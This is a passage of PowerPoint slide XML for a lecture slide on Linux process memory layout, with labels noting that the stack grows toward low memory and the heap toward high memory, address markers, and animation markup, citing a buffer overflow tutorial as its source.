            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	new(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack grows towards low memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap grows towards high memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Shape 31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Linux process</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Memory view</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="318" name="Shape 318"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="152400" x="4391475"/>
            <a:ext cy="6600239" cx="4403222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Shape 319"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="257925" x="6865125"/>
            <a:ext cy="416699" cx="2084100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Shape 320"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6261650" x="6865125"/>
            <a:ext cy="416699" cx="20841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0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 321"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5592950" x="1296209"/>
            <a:ext cy="1085399" cx="3137399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Source: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1c.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="322" name="Shape 322"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1838725" x="3656350"/>
            <a:ext cy="503399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1838725" x="3503950"/>
            <a:ext cy="503399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="324" name="Shape 324"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1838725" x="3808750"/>
            <a:ext cy="503399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="325" name="Shape 325"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1838725" x="3961150"/>
            <a:ext cy="503399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1838725" x="3351550"/>
            <a:ext cy="503399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1838725" x="3199150"/>
            <a:ext cy="503399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1838725" x="3046750"/>
            <a:ext cy="503399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="329" name="Shape 329"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1838725" x="2894350"/>
            <a:ext cy="503399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2460050" x="2342950"/>
            <a:ext cy="652800" cx="21548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lang="en"/>
              <a:t>RESERVED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="331" name="Shape 331"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3130850" x="2885600"/>
            <a:ext cy="456299" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="332" name="Shape 332"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3130850" x="3038000"/>
            <a:ext cy="456299" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="333" name="Shape 333"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3130850" x="3190400"/>
            <a:ext cy="456299" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3130850" x="3342800"/>
            <a:ext cy="456299" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3130850" x="3495200"/>
            <a:ext cy="456299" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="336" name="Shape 336"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3130850" x="3647600"/>
            <a:ext cy="456299" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="337" name="Shape 337"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3130850" x="3800000"/>
            <a:ext cy="456299" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="338" name="Shape 338"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3130850" x="3952400"/>
            <a:ext cy="456299" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Shape 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3482450" x="4874644"/>
            <a:ext cy="542699" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7500">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40" name="Shape 340"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1213550" x="4874644"/>
            <a:ext cy="677999" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0101">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41" name="Shape 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4051116" x="4874644"/>
            <a:ext cy="338100" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="57FF00">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42" name="Shape 342"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4393634" x="4874644"/>
            <a:ext cy="338100" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FFC9">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43" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4743188" x="4874644"/>
            <a:ext cy="1810500" cx="1825500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A00FF">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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="323"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="324"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="324"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="325"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="325"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="326"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="326"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="327"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="328"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="328"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="329"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="329"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="322"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">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32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="332"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="334"/>
